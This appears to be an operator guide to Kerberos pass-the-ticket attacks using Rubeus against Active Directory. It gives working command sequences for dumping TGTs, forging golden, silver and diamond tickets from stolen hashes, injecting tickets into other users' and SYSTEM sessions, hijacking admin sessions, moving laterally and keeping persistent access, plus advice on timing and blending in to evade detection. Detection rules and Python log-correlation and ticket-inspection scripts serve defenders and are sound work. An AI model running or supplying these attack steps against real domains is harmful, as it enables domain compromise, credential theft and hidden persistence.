Pass-the-ticket: inject Kerberos tickets into the current session
Pass-the-ticket (PTT) injects Kerberos tickets into a logon session so that the session authenticates to services with tickets that were extracted elsewhere or forged, without knowing the account's password: the ticket itself is the credential. Rubeus submits the ticket to the LSA's Kerberos authentication package (the same path `klist` uses), so no LSASS memory access is involved. PTT is the standard final step for lateral movement with stolen TGTs and for putting golden, silver and diamond tickets to use.
Inject a ticket from a .kirbi file (absolute or relative path); `ptt` takes one ticket per invocation:

```powershell
# Inject a ticket from a .kirbi file
Rubeus.exe ptt /ticket:C:\temp\admin.kirbi
# Relative paths work too
Rubeus.exe ptt /ticket:tickets\domain_admin.kirbi
# Multiple tickets: one ptt call per ticket
Rubeus.exe ptt /ticket:ticket1.kirbi
Rubeus.exe ptt /ticket:ticket2.kirbi
```

Without `/luid`, the ticket goes into the current logon session; verify with `klist`:

```powershell
# Inject into the current user session (default)
Rubeus.exe ptt /ticket:user_ticket.kirbi
# Verify: the ticket should now appear in the current session's cache
Rubeus.exe klist
```

Move a TGT between systems. `dump` prints tickets as base64 (it has no file-output option; `/nowrap` keeps the blob on one line), and `/ticket` accepts either a .kirbi path or the base64 blob itself. Without elevation `dump` only sees the current session:

```powershell
# Extract the TGT on the source system (base64 output)
Rubeus.exe dump /service:krbtgt /nowrap
# Inject on another system (path to a .kirbi, or the base64 blob)
Rubeus.exe ptt /ticket:extracted.kirbi
# Verify, then use it: the OS requests the cifs/target service ticket with the injected TGT
Rubeus.exe klist
dir \\target.corp.local\c$
```

Extracted TGTs and forged golden tickets are injected the same way. `asktgs` always needs the TGT via `/ticket`; it does not pick it up from the cache:

```powershell
# Inject an extracted TGT
Rubeus.exe ptt /ticket:extracted_tgt.kirbi
# Inject a forged golden ticket
Rubeus.exe ptt /ticket:golden_ticket.kirbi
# Test that the TGT can obtain service tickets
Rubeus.exe asktgs /ticket:golden_ticket.kirbi /service:cifs/fileserver.corp.local /ptt
```
A TGT is the most flexible ticket to inject: the session can use it to request a service ticket for any SPN, with whatever identity and group SIDs its PAC carries, until it expires (for a forged TGT, until the end time the forger chose).
Service Ticket Characteristics
Properties:
- Grant access to one service principal only (the SPN in the ticket)
- Immediately usable, but not a TGT: cannot be exchanged for further tickets
- Lifetime bounded by domain policy (10 hours by default) and by the issuing TGT
- Access is decided by the service from the PAC in the ticket; the ticket is protected by the service account's key, not by the DC
Common SPN classes:
- CIFS: SMB file shares, including admin shares (PsExec copies its service binary over ADMIN$, so it needs CIFS)
- HOST: scheduled tasks and, together with HTTP, PowerShell remoting on the target (WMI additionally needs RPCSS)
- LDAP: directory queries and modifications against a DC
- HTTP: IIS and other web applications using Windows authentication
- MSSQL: SQL Server

```powershell
# Inject a CIFS service ticket and test file access immediately
Rubeus.exe ptt /ticket:cifs_ticket.kirbi
dir \\fileserver.corp.local\share
# PsExec runs over SMB (ADMIN$ and the service control pipe), so it needs a CIFS ticket
# for the target, not a HOST ticket
Rubeus.exe ptt /ticket:target_cifs_ticket.kirbi
psexec \\target.corp.local cmd
```

Service tickets give immediate access to the one SPN they were issued for; because they are not TGTs they cannot be used to request additional tickets.
Golden Tickets
Characteristics:
- TGTs forged with the krbtgt account's key (NT hash for RC4, or AES key), so the DC accepts them as its own
- Carry whatever user, RID and group SIDs the forger chooses, giving domain-wide access
- Lifetime is set by the forger rather than by domain policy (Mimikatz defaults to 10 years); a lifetime beyond policy is itself an indicator
- Once a TGT is more than 20 minutes old the KDC checks that the account exists, so forge for a real account
- Stay valid until the krbtgt password has been rotated twice

```powershell
# Forge and inject a golden ticket; /ldap pulls the domain SID and related fields from AD
# (otherwise supply /domain and /sid yourself)
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /outfile:golden.kirbi
Rubeus.exe ptt /ticket:golden.kirbi
```
Silver Tickets
Characteristics:
- Service tickets forged with the key of the service account (for CIFS and HOST this is the computer account's key)
- Limited to services that share that key
- Never touch the DC: no 4768/4769 is logged, and most services do not validate the PAC with a DC
- Useful for targeted, low-noise access to one host or service

```powershell
# Forge and inject a silver ticket for a single SPN using the service account's RC4 key
Rubeus.exe silver /user:admin /service:cifs/fileserver.corp.local /rc4:service_hash /outfile:silver.kirbi
Rubeus.exe ptt /ticket:silver.kirbi
```
Diamond Tickets
Characteristics:
- Hybrid of a legitimate and a forged ticket: a real TGT is requested with known credentials, decrypted with the krbtgt key, its PAC modified (for example adding RID 512, Domain Admins), and re-encrypted
- Stealthier than a golden ticket because a matching 4768 exists on the DC and the ticket's times and flags are the ones the KDC issued
- Requires the krbtgt AES key (`/krbkey`) plus a valid user credential

```powershell
# Request a real TGT as a low-privilege user, rewrite its PAC with the krbtgt key, and inject it
Rubeus.exe diamond /user:user /password:pass /krbkey:krbtgt_key /groups:512 /outfile:diamond.kirbi
Rubeus.exe ptt /ticket:diamond.kirbi
```
Injection into the current session (no `/luid` needed):

```powershell
# Basic injection into the current session
Rubeus.exe ptt /ticket:user_ticket.kirbi
# Verify injection
Rubeus.exe klist
# Test access
dir \\target.corp.local\share
```

Use Cases
Typical scenarios:
- Standard credential reuse
- Lateral movement in the current user's context
- Service access with the current session's privileges
- Testing extracted credentials
LUID Targeting
Elevated requirements:
- Injecting into any session other than your own requires an elevated (high-integrity administrator) context
- Any logon session on the host can be targeted by its LUID
- Enables cross-user ticket injection, e.g. planting a ticket in a service account's session
- Useful for persistence: a ticket in a long-lived session is reused by everything running in it

```powershell
# Enumerate logon sessions (triage or klist /luid shows which tickets each session holds)
Rubeus.exe logonsession
# Inject into a specific session
Rubeus.exe ptt /ticket:admin.kirbi /luid:0x54321
# Verify injection in the target session
Rubeus.exe klist /luid:0x54321
```

Strategic Applications
Advanced use cases:
- Inject into service account sessions
- Target administrative sessions
- Cross-user authentication
- System-wide credential distribution
Machine Account Operations
SYSTEM session (LUID 0x3e7):
- Processes running as SYSTEM use the computer account's (HOST$) tickets from this session
- A ticket injected here is used by every SYSTEM service, so it is a common persistence target
- The computer account's TGT is what the host itself uses for domain operations (Group Policy, LDAP lookups, secure channel)
- Requires elevation, like any other cross-session injection

```powershell
# Inject a TGT into the SYSTEM session
Rubeus.exe ptt /ticket:machine_tgt.kirbi /luid:0x3e7
# Verify, then test the TGT by requesting a service ticket with it
Rubeus.exe klist /luid:0x3e7
Rubeus.exe asktgs /ticket:machine_tgt.kirbi /service:ldap/dc01.corp.local
```
Successful import output:

```
[*] Action: Import Ticket
[*] Target LUID: 0x54321
[+] Ticket successfully imported!
```

A successful import only means the LSA accepted the KRB-CRED blob into the target session's cache. The LSA neither decrypts nor validates the ticket on import (it cannot: a TGT is encrypted to the krbtgt key), so a forged, expired or corrupted ticket imports just as cleanly. Failures surface when the ticket is presented, and typically mean:
- A forged or tampered ticket that the KDC or service rejects (wrong key or invalid signature, e.g. KRB_AP_ERR_MODIFIED)
- An expired ticket (KRB_AP_ERR_TKT_EXPIRED)
- Cross-domain trust issues (a ticket for one realm presented to a service in another)
- Service-side PAC validation failing when the service verifies the PAC with a DC
Failed cross-session import:

```
[!] Unhandled Rubeus exception:
System.ComponentModel.Win32Exception: Access is denied
   at Rubeus.LSA.ImportTicket(Byte[] ticket, UInt64 targetLuid)
[!] Unable to import ticket - check LUID and privileges
[!] Cross-session injection requires administrative privileges
```

Common error scenarios:
- Access denied: the target LUID is not your own session and Rubeus is not running elevated
1. Ticket acquisition
Obtain a ticket from the local cache, via the delegation trick, or by watching for new logons. All three print the ticket as base64; pass it to `/ticket` directly or decode it into a .kirbi file:

```powershell
# Extract from the current system (elevated: all sessions; otherwise the current session only)
Rubeus.exe dump /service:krbtgt /nowrap
# Obtain a usable TGT for the current user without elevation (GSS-API delegation trick)
Rubeus.exe tgtdeleg /nowrap
# Monitor for new TGTs of a given user as logons occur (elevated)
Rubeus.exe monitor /filteruser:admin /nowrap
```

2. Ticket injection
Inject the acquired ticket into the appropriate session:

```powershell
# Inject into the current session
Rubeus.exe ptt /ticket:acquired_ticket.kirbi
# Inject into a specific session (elevated only)
Rubeus.exe ptt /ticket:admin_ticket.kirbi /luid:0x54321
```

3. Verification
Confirm the ticket is cached and that it actually works against a service:

```powershell
# List cached tickets in the current session
Rubeus.exe klist
# Inspect the ticket file itself (service, client, etype, lifetimes)
Rubeus.exe describe /ticket:injected_ticket.kirbi
# Test service access
dir \\target.corp.local\c$
```
Cross-system ticket transfer:

```powershell
# Extract the TGT on System A (base64 output; save it as admin_tgt.kirbi)
Rubeus.exe dump /service:krbtgt /nowrap
# Transfer to System B and inject
Rubeus.exe ptt /ticket:admin_tgt.kirbi
# Access resources from System B; asktgs takes the TGT via /ticket
Rubeus.exe asktgs /ticket:admin_tgt.kirbi /service:cifs/fileserver.corp.local /ptt
dir \\fileserver.corp.local\admin_share
```

Multi-Hop Operations

```powershell
# Hop 1: initial system with user credentials; /ptt injects the TGT, /outfile saves it for transfer
Rubeus.exe asktgt /user:user /password:pass /ptt /outfile:user_tgt.kirbi
# Hop 2: intermediate system
Rubeus.exe ptt /ticket:user_tgt.kirbi
Rubeus.exe kerberoast /outfile:service_hashes.txt
# Hop 3: final target with a cracked service account password
Rubeus.exe asktgt /user:svc_sql /password:cracked_pass /ptt
```

Session Hijacking

```powershell
# Enumerate sessions and look for high-privilege accounts (elevated)
Rubeus.exe logonsession
# Extract the TGT from an administrative session (base64; save as admin_tgt.kirbi)
Rubeus.exe dump /luid:0x54321 /service:krbtgt /nowrap
# Inject into the current session for privilege escalation
Rubeus.exe ptt /ticket:admin_tgt.kirbi
# Test elevated access
dir \\dc01.corp.local\c$
```

Service Account Escalation
This needs the TGT (not a service ticket) of an account configured for constrained delegation with protocol transition to the target SPN:

```powershell
# Start with the delegating service account's TGT
Rubeus.exe ptt /ticket:svc_tgt.kirbi
# S4U2self then S4U2proxy: impersonate admin to an SPN listed in msDS-AllowedToDelegateTo
Rubeus.exe s4u /ticket:svc_tgt.kirbi /impersonateuser:admin /msdsspn:cifs/target.corp.local /ptt
# Access the target as the impersonated user
dir \\target.corp.local\c$
```

Golden Ticket Deployment

```powershell
# Create multiple golden tickets for redundancy
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /outfile:admin_golden.kirbi
Rubeus.exe golden /user:backup_admin /rc4:krbtgt_hash /ldap /outfile:backup_golden.kirbi
# Deploy across multiple systems
# System 1
Rubeus.exe ptt /ticket:admin_golden.kirbi
# System 2
Rubeus.exe ptt /ticket:backup_golden.kirbi
# Test persistent access (asktgs needs the TGT via /ticket)
Rubeus.exe asktgs /ticket:admin_golden.kirbi /service:cifs/fileserver.corp.local /ptt
```

Service-Specific Persistence

```powershell
# Create silver tickets for specific services
Rubeus.exe silver /user:admin /service:cifs/fileserver.corp.local /rc4:service_hash /outfile:file_silver.kirbi
Rubeus.exe silver /user:admin /service:mssql/sqlserver.corp.local /rc4:sql_hash /outfile:sql_silver.kirbi
# Deploy service-specific access
Rubeus.exe ptt /ticket:file_silver.kirbi
Rubeus.exe ptt /ticket:sql_silver.kirbi
```
- Service accounts performing interactive operations
- Authentication outside normal business hours
- Geographic or network location anomalies
Event Log Analysis
Windows event logs (collect from every DC, since a user's 4768 and 4769 may land on different DCs):
- 4769 (service ticket request) for a user and client address with no preceding 4768 (TGT request) from that address: the TGT was injected or forged rather than requested from that host
- Network logons on a target (4624 logon type 3) for an account that never logged on interactively (4624 type 2 or 10) to the source host
- 4769 with TicketEncryptionType 0x17 (RC4) in a domain that issues AES tickets, or TGT lifetimes beyond domain policy: forged-ticket indicators
- Cross-LUID injection needs elevation, so correlate with elevation and process activity on the source host
Kerberos event monitoring:
- TGS usage without a corresponding TGT acquisition
- Unusual encryption types or ticket characteristics (lifetime, account that does not exist in AD)
- Service access patterns inconsistent with the user's normal behaviour
Timing Considerations

```powershell
# Inject and use tickets during the target user's business hours (e.g. 09:00-17:00)
# and leave realistic gaps between injection and first use
Rubeus.exe ptt /ticket:admin.kirbi
# Wait a few minutes before the first access
dir \\target.corp.local\share
```

Behavioral Blending

```powershell
# Use tickets consistent with the user's normal activity
Rubeus.exe ptt /ticket:user_appropriate_ticket.kirbi
# Access resources the user normally accesses
dir \\fileserver.corp.local\user_documents
# Avoid obviously administrative actions immediately after injection;
# let ordinary activity accumulate before escalating
```

Technical Evasion

```powershell
# Use the current session when possible: /luid targeting needs elevation and stands out
Rubeus.exe ptt /ticket:ticket.kirbi
# Prefer legitimately issued (extracted) tickets over forged ones: they have a matching 4768 on the DC
# and the expected etype, lifetime and PAC
# Use service-specific tickets rather than broad TGTs when one service is enough
Rubeus.exe ptt /ticket:specific_service.kirbi
```
Detection Implementation
Host-based monitoring:
- Monitor LSA authentication package interactions: Rubeus `ptt` and `dump` go through LsaCallAuthenticationPackage and never open a handle to LSASS memory
- Implement process behaviour analysis
- Track memory access to LSASS (this catches Mimikatz-style `sekurlsa` extraction, not LSA-API ticket injection)
- Alert on unusual API call patterns
Sysmon configuration (event 10). Filters inside one event element are OR'd unless wrapped in a `Rule` with `groupRelation="and"`, and `TargetImage` must match the full path, so the rule reads:

```xml
<!-- Monitor process access to LSASS. Flags memory readers such as mimikatz sekurlsa;
     Rubeus ptt submits the ticket through the LSA API without opening lsass.exe,
     so it does not trigger this rule. Real tools often request smaller masks
     (0x1010, 0x1410, 0x1438) than PROCESS_ALL_ACCESS; add those as further rules. -->
<RuleGroup name="" groupRelation="or">
  <ProcessAccess onmatch="include">
    <Rule groupRelation="and">
      <TargetImage condition="end with">lsass.exe</TargetImage>
      <GrantedAccess condition="is">0x1fffff</GrantedAccess>
    </Rule>
  </ProcessAccess>
</RuleGroup>
```
Behavioral Analysis
SIEM rules (pseudo-SQL against a hypothetical normalized event table; adapt the column names to your schema):

```sql
-- Service ticket use (4769) with no TGT request (4768) from the same client within the TGT lifetime
SELECT tgs.*
FROM events AS tgs
LEFT JOIN events AS tgt
       ON tgt.event_id = 4768
      AND tgt.target_user = tgs.target_user
      AND tgt.client_ip = tgs.client_ip
      AND tgt.event_time BETWEEN tgs.event_time - INTERVAL '10 hours' AND tgs.event_time
WHERE tgs.event_id = 4769
  AND tgt.event_id IS NULL;

-- Cross-session activity: an elevated process acting on a logon session owned by another user
SELECT *
FROM process_events
WHERE elevated = TRUE
  AND process_owner <> session_owner;
```
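The correlation behind the "TGS usage without corresponding TGT acquisition" indicator above and the first SIEM rule, as an added example in Python (not code from the page or from Rubeus). It runs over constructed DC event records whose field names follow the Security log's EventData (`TargetUserName`, `IpAddress`, `TicketEncryptionType`); the sample events, the 10-hour window (the default maximum TGT lifetime) and the assumption that the domain issues AES tickets are all assumptions of the example.

```python
"""Correlate DC Kerberos events (4768/4769) to spot pass-the-ticket and forged-ticket use.

Added example; not part of Rubeus or the original page. The events are constructed.
"""
from datetime import datetime, timedelta

# Constructed sample: one normal user, one ticket used from a host that never
# requested it, and one RC4 ticket for an admin with no TGT request at all.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TimeCreated": "2024-03-04T09:00:00", "TargetUserName": "alice",
     "IpAddress": "::ffff:10.0.0.5", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TimeCreated": "2024-03-04T09:05:00", "TargetUserName": "alice@CORP.LOCAL",
     "IpAddress": "::ffff:10.0.0.5", "ServiceName": "FILESERVER$", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TimeCreated": "2024-03-04T09:30:00", "TargetUserName": "admin@CORP.LOCAL",
     "IpAddress": "::ffff:10.0.0.9", "ServiceName": "DC01$", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-03-04T10:00:00", "TargetUserName": "alice@CORP.LOCAL",
     "IpAddress": "::ffff:10.0.0.77", "ServiceName": "DC01$", "TicketEncryptionType": "0x12"},
]

RC4_HMAC = 0x17


def _user(name):
    # 4768 logs "alice", 4769 logs "alice@CORP.LOCAL"; normalize to the bare name
    return name.split("@")[0].lower()


def _ip(addr):
    # Client addresses are logged as IPv4-mapped IPv6 ("::ffff:10.0.0.5")
    return addr.replace("::ffff:", "")


def detect(events, tgt_window=timedelta(hours=10), aes_only_domain=True):
    """Return (time, user, client_ip, reason) tuples.

    Rule 1: a 4769 for (user, client) with no 4768 from the same pair inside tgt_window
            means the TGT in use was not requested from that host: injected or forged.
    Rule 2: a 4769 with etype 0x17 in a domain that issues AES tickets points at a
            ticket forged from an RC4/NT hash.
    Both rules need the logs of every DC (the 4768 and the 4769 may land on different
    DCs); in production, renewals (4770) should extend the window as well.
    """
    last_tgt = {}   # (user, client_ip) -> time of the most recent 4768
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        key = (_user(ev["TargetUserName"]), _ip(ev["IpAddress"]))
        if ev["EventID"] == 4768:
            last_tgt[key] = ts
            continue
        if ev["EventID"] != 4769:
            continue
        seen = last_tgt.get(key)
        if seen is None or ts - seen > tgt_window:
            findings.append((ev["TimeCreated"], key[0], key[1],
                             "TGS request without a TGT request from this client (PTT/golden candidate)"))
        if aes_only_domain and int(ev["TicketEncryptionType"], 16) == RC4_HMAC:
            findings.append((ev["TimeCreated"], key[0], key[1],
                             "RC4 (0x17) service ticket in an AES domain (forged-ticket indicator)"))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

On the sample, alice's 09:05 request is clean (her TGT was requested from the same host five minutes earlier), the admin request at 09:30 fires both rules, and alice's 10:00 request from 10.0.0.77 fires the first rule because her TGT was issued to 10.0.0.5 and has been moved to another host.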
Problem: cannot inject into a specific LUID
Solutions:
- Verify the current process is elevated (an administrator token that has passed UAC)
- Check that the target LUID exists (`logonsession`) and is accessible
- Inject into the current session instead
- Check whether anti-malware is blocking Rubeus

```powershell
# Check current privileges and integrity level
whoami /priv
# Enumerate available sessions
Rubeus.exe logonsession
# Fall back to current-session injection
Rubeus.exe ptt /ticket:ticket.kirbi
```

Problem: invalid ticket format or corruption
Solutions:
- Verify the ticket file is intact (a .kirbi is raw DER; the first byte is 0x76, the [APPLICATION 22] tag of KRB-CRED)
- If pasting base64, check that the blob is complete; line wraps lost in copy-paste are the usual cause, so extract with `/nowrap`
- Ensure the ticket has not expired (`describe` prints start, end and renew-till times)
- Extract the ticket again from the source

```powershell
# Describe the ticket to check its contents and validity
Rubeus.exe describe /ticket:suspect_ticket.kirbi
# Check file size and contents
dir ticket.kirbi
# /ticket also accepts the base64 blob directly instead of a file path
Rubeus.exe ptt /ticket:base64_encoded_ticket_data
```
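What `describe` reads out of a .kirbi, and the offline integrity check suggested above, as an added Python example (not code from the page or from Rubeus). It walks the KRB-CRED DER structure and reports realm, SPN, etype, kvno, client and expiry. It assumes the layout Rubeus and Mimikatz write, where the KRB-CRED enc-part uses etype 0 so the EncKrbCredPart holding the lifetimes is readable without a key; a KRB-CRED whose enc-part is really encrypted yields no expiry. The sample ticket built by `build_sample_kirbi()` is constructed here with dummy cipher bytes, not a real ticket.

```python
"""Inspect a .kirbi (KRB-CRED) offline: service, realm, etype, kvno, client and expiry.

Added example, not Rubeus code. The sample ticket is constructed; its cipher bytes are dummies.
"""
import sys
from datetime import datetime, timezone


# --- minimal DER encoding/decoding; Kerberos uses single-byte tags throughout ---
def der(tag, body):
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + body


def ctx(n, body): return der(0xA0 | n, body)      # context-specific [n]
def app(n, body): return der(0x60 | n, body)      # [APPLICATION n]
def seq(*items): return der(0x30, b"".join(items))
def integer(v): return der(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))
def gstring(s): return der(0x1B, s.encode())      # GeneralString
def octets(b): return der(0x04, b)
def gentime(s): return der(0x18, s.encode())      # GeneralizedTime "YYYYmmddHHMMSSZ"


def principal(name_type, *parts):
    return seq(ctx(0, integer(name_type)), ctx(1, seq(*[gstring(p) for p in parts])))


def encrypted_data(etype, cipher, kvno=None):
    fields = [ctx(0, integer(etype))] + ([ctx(1, integer(kvno))] if kvno is not None else [])
    return seq(*fields, ctx(2, octets(cipher)))


def build_sample_kirbi(endtime):
    """Constructed KRB-CRED holding one RC4 service ticket for cifs/fileserver.corp.local."""
    spn = principal(2, "cifs", "fileserver.corp.local")                       # NT-SRV-INST
    ticket = app(1, seq(ctx(0, integer(5)), ctx(1, gstring("CORP.LOCAL")), ctx(2, spn),
                        ctx(3, encrypted_data(23, b"\x00" * 32, kvno=2))))     # 23 = RC4-HMAC
    info = seq(ctx(0, seq(ctx(0, integer(23)), ctx(1, octets(b"\x11" * 16)))),  # session key
               ctx(1, gstring("CORP.LOCAL")), ctx(2, principal(1, "alice")),   # client
               ctx(6, gentime(endtime)), ctx(8, gstring("CORP.LOCAL")), ctx(9, spn))
    enc_cred_part = app(29, seq(ctx(0, seq(info))))
    return app(22, seq(ctx(0, integer(5)), ctx(1, integer(22)), ctx(2, seq(ticket)),
                       ctx(3, encrypted_data(0, enc_cred_part))))            # etype 0: cleartext


def parse_tlv(buf, i=0):
    """Decode one DER element at offset i -> ((tag, children-or-bytes), next_offset)."""
    tag, n, i = buf[i], buf[i + 1], i + 2
    if n & 0x80:
        k = n & 0x7F
        n, i = int.from_bytes(buf[i:i + k], "big"), i + k
    body, i = buf[i:i + n], i + n
    if tag & 0x20:                               # constructed: recurse into children
        kids, j = [], 0
        while j < len(body):
            kid, j = parse_tlv(body, j)
            kids.append(kid)
        return (tag, kids), i
    return (tag, body), i


def field(node, n):
    """The element wrapped in context tag [n] inside a constructed node, or None."""
    for tag, kids in node[1]:
        if tag == (0xA0 | n):
            return kids[0]
    return None


def principal_str(node):
    return "/".join(part[1].decode() for part in field(node, 1)[1])


def describe_kirbi(data, now=None):
    top, _ = parse_tlv(data)
    if top[0] != 0x76:
        raise ValueError("not a KRB-CRED (expected [APPLICATION 22])")
    body = top[1][0]
    tkt = field(body, 2)[1][0][1][0]             # first Ticket -> its SEQUENCE
    enc = field(tkt, 3)
    out = {"realm": field(tkt, 1)[1].decode(), "sname": principal_str(field(tkt, 2)),
           "etype": int.from_bytes(field(enc, 0)[1], "big"),
           "kvno": int.from_bytes(field(enc, 1)[1], "big") if field(enc, 1) else None}
    cred_enc = field(body, 3)
    if int.from_bytes(field(cred_enc, 0)[1], "big") != 0:
        out["endtime"] = None                    # EncKrbCredPart really encrypted: no lifetimes
        return out
    part, _ = parse_tlv(field(cred_enc, 2)[1])
    info = field(part[1][0], 0)[1][0]            # first KrbCredInfo
    out["client"] = principal_str(field(info, 2))
    end = field(info, 6)[1].decode()
    out["endtime"] = datetime.strptime(end, "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)
    out["expired"] = out["endtime"] < (now or datetime.now(timezone.utc))
    return out


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_kirbi("20240101120000Z")
    for k, v in describe_kirbi(data).items():
        print(f"{k:>8}: {v}")
```

Run it with a path to a .kirbi to inspect a real file, or with no arguments to see the constructed sample, which reports an RC4 (etype 23) ticket for cifs/fileserver.corp.local issued to alice that has already expired. An etype of 23 in a domain that issues AES tickets is worth noticing before injecting, for the same reason it is a detection indicator.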
Problem: injected ticket does not provide the expected access
Solutions:
- Verify the ticket was injected successfully
- Check the ticket's user and group memberships (the PAC decides what the service grants)
- Ensure the target services are reachable and use Kerberos (an IP address instead of a hostname falls back to NTLM)
- Verify the ticket has not expired

```powershell
# Verify injection success
Rubeus.exe klist
# Check ticket contents
Rubeus.exe describe /ticket:injected_ticket.kirbi
# Test with a share the identity is known to reach
dir \\known_accessible_share
```